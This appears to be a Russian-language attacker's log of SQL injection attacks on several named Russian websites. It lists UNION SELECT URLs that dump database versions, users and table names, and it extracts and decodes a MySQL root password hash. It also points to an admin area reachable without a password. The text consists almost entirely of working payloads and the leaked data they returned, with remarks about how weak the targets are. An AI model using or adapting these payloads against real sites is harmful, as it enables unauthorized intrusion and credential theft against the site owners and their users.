http://www.rateshops.ru/shops.php?fil=&cid=-130+union+select+1,concat_ws(0x3a,version(),user() ,database()),3,4
5.0.22:us5167f@localhost
ivomani_shops
http://www.rateshops.ru/shops.php?fil=&cid=-130+union+select+1,TABLE_NAME,3,4+from+information _schema.tables+limit+50,1
Пробуем обратиться к: mysql.user
http://www.rateshops.ru/shops.php?fil=&cid=-130+union+select+1,Password,3,4+from+mysql.user+wh ere+User=0x726F6F74
Получаем: Illegal mix of collations (cp1251_general_ci,IMPLICIT) and (latin1_bin,IMPLICIT) for operation 'UNION'
ммм, несоответсвие кодировок. закодируем пароль в .. ну например в hex
http://www.rateshops.ru/shops.php?fil=&cid=-130+union+select+1,hex(Password),3,4+from+mysql.us er+where+User=0x726F6F74
получаем: 31666466326136313036646134646139
преобразовываем обратно: 1fdf2a6106da4da9
Сайт по началу произвел нормальное впечатление, аккуратный, наполненый, но практически в каждом скрипте уязвим к SQL-INJ...
по показателям, сайт нулевой...
ещё один сайт, нулевой, просто ради опыта...
http://stistroy.ru/site.php?id=-4+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7,8
5.0.67-log:u149824:u149824@10.10.153.196
через information_schema.tables можно посмотреть какие таблицы есть, но ничего интересного нет. да и сайт пустой.
http://www.proherm.ru/site.php?id=-3+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7,8
4.1.22-log:wwwprohermruroherm@fe42.hc.ru
http://www.proherm.ru/site.php?id=-3+union+select+1,login,3,4,5,6,7,8+from+accounts+l imit+1,1
login: proherm
но потом оказалось, что это не нужно, нашел:
http://www.proherm.ru/a/
где всё доступно и без паролей.
http://www.valdis.net.ru/site.php?id=-433+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a, version(),database(),user()),11,12,13,14,15,16,17
5.0.77-community:valdis_valdis:valdis_valdis@localhost
http://www.valdis.net.ru/site.php?id=-433+union+select+1,2,3,4,5,6,7,8,9,TABLE_NAME,11,1 2,13,14,15,16,17+from+information_schema.tables+li mit+20,1
с 17 до 20 есть таблицы, с юзерами ничего не связано.
ТИЦ 50, PR 1